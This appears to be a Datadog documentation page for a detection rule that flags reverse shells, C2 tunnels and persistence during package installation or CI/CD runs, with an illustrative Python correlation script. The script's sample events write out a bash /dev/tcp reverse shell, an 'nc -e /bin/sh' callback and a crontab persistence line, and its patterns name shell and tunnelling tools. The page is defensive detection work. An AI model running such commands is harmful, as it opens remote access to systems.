---
title: Supply chain reverse shell
description: Datadog, the leading service for cloud-scale monitoring.
breadcrumbs: Docs > Datadog Security > OOTB Rules > Supply chain reverse shell
---

# Supply chain reverse shell
**Classification:** attack | **Tactic:** [TA0011-command-and-control](https://attack.mitre.org/tactics/TA0011) | **Technique:** [T1195-supply-chain-compromise](https://attack.mitre.org/techniques/T1195)

## What happened{% #what-happened %}

A reverse shell or command-and-control (C2) channel was established during a supply chain operation, such as package installation or CI/CD pipeline execution, on host `{{host}}`. A process running in the supply chain execution context spawned a shell or established a network tunnel to an attacker-controlled endpoint.

## Goal{% #goal %}

Detect when a malicious package or compromised CI/CD pipeline step establishes remote access through reverse shells, network tunnels, or C2 channels. This pattern is used by attackers to gain interactive access for lateral movement, privilege escalation, and data exfiltration.

## Strategy{% #strategy %}

This rule correlates three signal categories within `package_install_*` or `cicd_runner_*` execution contexts:

- **Reverse shell**: Execution of netcat, socat, openssl, Python, or Perl-based reverse shell techniques during package installation or CI/CD execution
- **Network C2**: Use of tunneling or lateral movement tools (chisel, ngrok, ligolo-ng), suspicious shell network connections, or IRC connections
- **Persistence**: Installation of cron jobs, systemd services, SSH authorized keys, kernel modules, or linker modifications

Persistence is used as a severity amplifier. A reverse shell combined with persistence indicates the attacker is establishing a durable foothold, not just a one-off connection.
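As an added illustration (not Datadog's rule query or code), the following Python snippet correlates constructed process events the way the strategy above describes: indicators are matched only inside `package_install_*` / `cicd_runner_*` contexts, grouped by an assumed correlation key, and a persistence signal in the same context raises the severity. The event shape, key format, and indicator patterns are assumptions made for the example.

```python
import re
from collections import defaultdict

# Constructed sample process events (not Datadog data). "key" is the assumed
# correlation key naming the execution context; "cmd" is the command line.
EVENTS = [
    {"key": "package_install_npm:build-7", "cmd": "npm install left-pad"},
    {"key": "package_install_npm:build-7", "cmd": "bash -i >& /dev/tcp/203.0.113.5/4444 0>&1"},
    {"key": "package_install_npm:build-7", "cmd": "(crontab -l; echo '* * * * * /tmp/.x') | crontab -"},
    {"key": "cicd_runner_gha:job-42", "cmd": "ngrok tcp 22"},
    {"key": "cicd_runner_gha:job-42", "cmd": "python3 -m pytest"},
    {"key": "shell:interactive", "cmd": "nc -e /bin/sh 203.0.113.9 4444"},
]

# Only these execution contexts are in scope for the rule (assumed key prefixes).
CONTEXT_RE = re.compile(r"^(package_install_|cicd_runner_)")

# Illustrative indicator patterns for the rule's three signal categories.
SIGNALS = {
    "reverse_shell": re.compile(
        r"/dev/tcp/|\b(nc|ncat|netcat|socat)\b.*(-e\b|exec:)|\b(perl|python\d?)\b.*\bsocket\b", re.I),
    "network_c2": re.compile(r"\b(chisel|ngrok|ligolo-ng)\b|\birc://|\bPRIVMSG\b", re.I),
    "persistence": re.compile(
        r"\bcrontab\b|/etc/cron|systemctl enable|authorized_keys|\b(insmod|modprobe)\b|ld\.so\.preload", re.I),
}

def evaluate(events):
    """Correlate signal categories per execution context.

    A finding fires only when a reverse-shell or network-C2 signal occurs inside a
    supply chain context; a persistence signal in the same context raises the
    severity from 'high' to 'critical', mirroring the rule's amplifier logic.
    """
    seen = defaultdict(set)
    for ev in events:
        if not CONTEXT_RE.match(ev["key"]):
            continue  # out-of-scope context, never contributes signals
        for name, pattern in SIGNALS.items():
            if pattern.search(ev["cmd"]):
                seen[ev["key"]].add(name)
    findings = {}
    for key, sigs in seen.items():
        if not sigs & {"reverse_shell", "network_c2"}:
            continue  # persistence alone does not fire this rule
        severity = "critical" if "persistence" in sigs else "high"
        findings[key] = {"signals": sorted(sigs), "severity": severity}
    return findings

if __name__ == "__main__":
    for key, f in evaluate(EVENTS).items():
        print(f"{f['severity'].upper():8} {key}: {', '.join(f['signals'])}")
```

The interactive `nc` event never produces a finding because its context is outside the rule's scope, which is the point of correlating on execution context rather than on command lines alone.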

## Triage and response{% #triage-and-response %}

1. Identify the package or CI/CD step that triggered the shell or network activity by examining the correlation key and process tree.
1. Capture the destination IP/hostname of the reverse shell or C2 connection for IOC tracking.
1. Terminate the malicious process and kill the reverse shell connection immediately.
1. Check if persistence mechanisms were installed (cron jobs, systemd units, SSH keys) and remove them.
1. Investigate whether the attacker performed any lateral movement or accessed additional systems.
1. Remove the malicious package and audit all systems that installed it.
1. Block the C2 IP/domain at the network perimeter.
1. Follow your organization's incident response process for active intrusions.
